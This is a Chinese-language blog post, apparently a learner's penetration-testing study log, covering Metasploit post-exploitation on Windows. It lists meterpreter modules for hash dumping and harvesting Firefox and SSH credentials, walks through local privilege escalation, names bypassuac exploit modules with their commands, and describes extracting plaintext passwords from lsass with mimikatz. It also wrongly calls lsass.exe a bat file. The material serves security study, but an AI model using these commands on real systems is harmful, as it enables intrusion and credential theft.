记录内网渗透学习进程--DAY3

post 后渗透模块
在获取到一枚meterpreter的shell之后,就可以进行下一步渗透了,就是后渗透
post模块的信息收集用得最多
sessions 获取到了一个seesion sessions id 进入会话

run post/multi/recon/local_exploit_suggester 提权,自动systeminfo,然后一个个比对能用的提权方式
run post/windows/gather/hashdump  获取系统密码哈希值
run post/windows/gather/smart_hashdump 一样
run post/multi/recon/local_exploit_suggester run post/multi/gather/firefox_creds  获取火狐保存的密码
run post/multi/gather/ssh_creds run post/windows/gather/enum_applications  查看目标的安装程序
其实这些可以用到的时候记,见一个能用的就记一个,明白基础用法就好

 

实操:

① 先在meterpreter命令处 输入 run post/multi/recon/local_exploit_suggester

可以看到可用的提权方式

 

②我们把现在的shell放进后台    background 并存储为session 1

 

 

 

③通过上面找到的提权漏洞,我们 search它 找到他的相关exp信息

 

 

④使用它,然后show options 看所需要填写的参数,填写上,然后运行

 

 

 ⑤成功返回了另外一个shell  它是system权限,成功提权

 



WINDOWS  UAC绕过


什么是UAC ⽤户帐户控制(简称UAC)是微软公司在其Windows Vista,及更⾼版本操作系统中采⽤的⼀种控制机制。通过 本⽂你将了解它是如何保护你免受恶意软件侵害的,以及忽略UAC提⽰将可能给你系统带来的⿇烦。

 

就是这个,有些东西要管理员身份运行,没有的话就运行不了,我们需要绕过的就是这个

 

 



UAC是如何运作的
⼀旦程序执⾏涉及系统更改/特定任务就会触发UAC。除⾮尝试执⾏它们的进程以管理员权限运⾏,否则这些操作都 将被阻⽌。没有管理员权限将⽆法执⾏以下操作: 注册表修改(如果注册表项位于如HKEY_LOCAL_MACHINE下(因为它影响多个⽤户),它将是只读的) 加载设备驱动程序 DLL注⼊ 修改系统时间(clock) 修改⽤户帐户控制设置(通过注册表可以启⽤/禁⽤它,但你需要正确的权限才能执⾏该操作) 修改受保护的⽬录(例如Windows⽂件夹,Program Files) 计划任务(例如,以管理员权限⾃启动)


Metasploit如何绕过UAC限制
MSF中Bypassuac模块的使用前提有两个:
    一是系统当前用户必须在管理员组中,
    二是用户账户控制程序UAC设置为默认,即 “仅在程序试图更改我的计算机时通知我” 。

 

命令:
0 exploit/windows/local/bypassuac
1 exploit/windows/local/bypassuac_comhijack
2 exploit/windows/local/bypassuac_eventvwr
3 exploit/windows/local/bypassuac_fodhelper
4 exploit/windows/local/bypassuac_injection
5 exploit/windows/local/bypassuac_injection_winsxs
6 exploit/windows/local/bypassuac_silentcleanup
7 exploit/windows/local/bypassuac_sluihijack
8 exploit/windows/local/bypassuac_vbs

windows提权之UAC绕过
background 后到后台
use exploit/windows/local/bypassuac
set sessions id

exploit

和上面提权的操作差不多,这里就不演示了

 

 

获取明文系统密码

windows活跃的明文密码会存储在lsass.exe  这个bat文件的内存里

路径在C:\WINDOWS\system32\

我们可以通过调用MSF 的 mimikatz模块 来获取明文密码

① 首先拿到一台system权限的shell

②可以使用hashdump 获取密码的哈希值

 

③加载 mimikatz模块

 

④可以使用wdigest来获取明文密码   kerberos,msv(列出密码哈希) 也可以

 

posted @ 2021-04-15 09:48  paku  阅读(251)  评论(0编辑  收藏  举报